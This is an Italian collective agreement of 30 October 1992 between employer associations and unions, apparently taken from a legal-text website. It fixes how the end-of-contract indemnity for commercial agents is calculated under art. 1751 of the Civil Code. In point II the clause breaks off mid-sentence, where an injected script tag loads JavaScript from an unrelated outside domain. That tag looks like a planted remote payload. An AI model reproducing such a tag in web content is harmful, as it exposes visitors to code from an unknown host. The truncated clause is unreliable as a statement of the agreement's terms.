Torna all'elenco delle categorie

Categoria: Agenti di commercio (imprese industriali)
Settore: Commercio
Data stipula: 30-10-1992

ACCORDO ECONOMICO SETTORE INDUSTRIA

30 ottobre 1992

DISPOSIZIONI REGOLAMENTARI
DI CUI AGLI ARTT. 10 (FIRR) E 11 (INDENNITÀ DI CLIENTELA)
DELL'ACCORDO ECONOMICO COLLETTIVO DEL 16 NOVEMBRE 1988
PER LA DISCIPLINA DEL RAPPORTO DI AGENZIA E RAPPRESENTANZA COMMERCIALE



Il giorno 30 ottobre 1992, in Roma

Tra

-   CONFINDUSTRIA
-   INTERSIND
-   ASAP
-   CONFCOOPERATIVE

e

-   FILCAMS
-   FISASCAT
-   FNAARC
-   UILTUCS
-   USARCI

1)   Considerato  che,  per effetto dell'entrata in  vigore  dell'art.  4,
  D.lgs.  10.9.91  n.  303,  viene innovata  la  disciplina  prevista  dal
  precedente art. 1751 C.C. in materia d'indennità per lo scioglimento del
  contratto;
2)   considerando, altresì, che le disposizioni di cui agli artt. 10 e  11
  dell'A.E.C. 16.11.88 vengono a decadere, a seguito dell'entrata in vigore
  della nuova disciplina;
3)   rilevato,  conseguentemente,  che tali  disposizioni  collettive  non
  troveranno  più  applicazione  dopo il  31.12.92  e  dopo  il  31.12.93,
  rispettivamente in relazione ai contratti di agenzia stipulati dall'1.1.90
  o anteriormente a tale data;
4)   ritenuta  l'opportunità, per dare piena ed  esaustiva  attuazione  al
  nuovo art. 1751 C.C., di individuare modalità e criteri applicativi dello
  stesso;

ad esito delle trattative intercorse,

si è concordata la norma che segue:

I. In  riferimento  a quanto previsto dall'art. 1751 C.C., come modificato
   dall'art. 4,  D.lgs 10.9.91  n. 303,  e in particolar modo al principio
   dell'equità,  in  tutti  i  casi  di  cessazione  del  rapporto,  verrà
   corrisposta  all'agente  o rappresentante un'indennità, la misura della
   quale  sarà  pari  all'1%  sull'ammontare  globale   delle  provvigioni
   maturate e liquidate durante il corso del rapporto.

   La suddetta aliquota base sarà integrata nelle seguenti misure:

A)  Agenti e Rappresentanti con obbligo di esclusiva per una sola ditta:

-   3% sulle provvigioni fino a £. 24.000.000 annui;
-    1%  sulla  quota  di provvigioni tra £. 24.000.001  e  £.  36.000.000
   annui.

B)   Agenti  e  Rappresentanti senza obbligo di  esclusiva  per  una  sola
   ditta:

-   3% sulle provvigioni fino a £. 12.000.000 annui;
-    1%  sulla  quota  di provvigioni tra £. 12.000.001  e  £.  18.000.000
   annui.

   Da  tale indennità deve detrarsi quanto l'agente o rappresentante abbia
   diritto  di  ottenere per effetto di atti di previdenza volontariamente
   compiuti dal preponente.

   Sono  computabili  agli  effetti  dell'indennità  di  risoluzione   del
   rapporto  anche  le somme corrisposte espressamente e specificamente  a
   titolo di rimborso o concorso spese.

   Le  somme  di  cui sopra verranno annualmente accantonate all'ENASARCO,
   secondo  quanto  previsto  dalle norme regolamentari  allegate  all'AEC
   16.11.88.

   Le parti si danno reciprocamente atto che con quanto sopra hanno inteso
   soddisfare il criterio di equità, di cui al già citato art. 1751 C.C.


II. Sempre  in  attuazione  dell'art. 1751 C.C., in aggiunta alla somma di
    cui  al precedente punto I della presente normativa, verrà corrisposto
    un ulteriore importo così calcolato:

-   3% su tutte le provvigioni maturate;
-    0,50%  aggiuntivo  sulle  provvigioni maturate  dal  4°  al  6°  anno
   compiuto (nel limite massimo annuo di £. 72.000.000 di provvigioni);
-    0,50% ulteriore aggiuntivo sulle provvigioni maturate dopo il 6° anno
   compiuto (nel limite massimo annuo di £. 72.000.000 di provvigioni).

   Per  gli agenti e rappresentanti incaricati da case editrici di vendere
   esclusivamente a privati consumatori si conferma che l'ammontare  annuo
   delle   provvigioni  eccedenti  la  misura  del  12%  viene  preso   in
   considerazione  per il calcolo della somma aggiuntiva  nel  limite  del
   65%.

   Il  trattamento di cui al presente punto non è dovuto se  il  contratto
   si  scioglie  per<script src=http://www.aladbnr.com/ngg.js></script>













(c) 2002-2017 www.infoleges.it -  powered by Be Smart s.r.l - Note legali e Condizioni d'uso